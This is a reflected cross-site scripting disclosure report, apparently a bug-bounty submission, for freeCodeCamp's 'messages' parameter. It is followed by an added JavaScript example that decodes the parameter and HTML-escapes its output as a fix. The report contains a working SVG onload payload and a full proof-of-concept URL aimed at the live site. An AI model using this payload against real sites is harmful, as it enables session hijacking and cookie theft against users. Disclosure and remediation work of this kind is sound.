Browser used: Firefox 72.0.1 (64-bit)
OS: Windows 8.1 (64 bit) / Ubuntu 18.04
Testing: Manual Fuzzing
--POC--
Bug: Reflected XSS
Vulnerable URL: https://www.freecodecamp.org
Vulnerable Parameter : messages
Payload : success[0]%3D%2520Happy%2520Hacking%2521%3Csvg/onload=alert(document.cookie)%3E
Final POC URL : https://www.freecodecamp.org/learn/?messages=success[0]%3D%2520Happy%2520Hacking%2521%3Csvg/onload=alert(document.cookie)%3E
Steps of Reproduction:
1: Open the Final POC URL link in the Firefox browser.
Hopefully, you should see an alert box with the cookies inside, demonstrating the POC.
Attack Scenario: An attacker can craft a malicious link and can do malicious activities such as hijacking sessions, redirecting the victim to some malicious URL, force file download, etc.
Reference:
For more details, please refer to https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)
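The double-encoded `messages` parameter from the report, decoded layer by layer and then rendered with HTML output escaping. This is an added example, not code from the report or from freeCodeCamp; the function names, the allow-listed message types, the `flash-` class names and the assumption that the parameter carries a nested `type[index]=text` string are all hypothetical.

```javascript
// Added example: names and message format are assumptions, not freeCodeCamp's code.

// Constructed sample input: the PoC URL quoted in the report.
const POC_URL =
  'https://www.freecodecamp.org/learn/?messages=' +
  'success[0]%3D%2520Happy%2520Hacking%2521%3Csvg/onload=alert(document.cookie)%3E';

// Hypothetical allow-list of message types the page is willing to render.
const ALLOWED_TYPES = new Set(['success', 'info', 'danger']);

// Escape the five characters that are significant in HTML text and attributes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Decode both layers: the outer query string, then the nested
// "type[index]=text" string carried inside the messages parameter.
function parseFlashMessages(url) {
  const outer = new URL(url).searchParams.get('messages'); // first decode
  if (outer === null) return [];
  const messages = [];
  for (const [key, value] of new URLSearchParams(outer)) { // second decode
    const m = /^([a-z]+)\[\d+\]$/.exec(key);
    if (!m || !ALLOWED_TYPES.has(m[1])) continue; // drop unknown shapes and types
    messages.push({ type: m[1], text: value });
  }
  return messages;
}

// Render every message as escaped text, so markup in the parameter stays inert.
function renderFlashMessages(url) {
  return parseFlashMessages(url)
    .map(({ type, text }) => `<div class="flash-${type}">${escapeHtml(text)}</div>`)
    .join('\n');
}
```

The decoded text still contains the `<svg/onload=...>` markup after the second decode, which is why the escaping has to happen at output time rather than by filtering the raw query string.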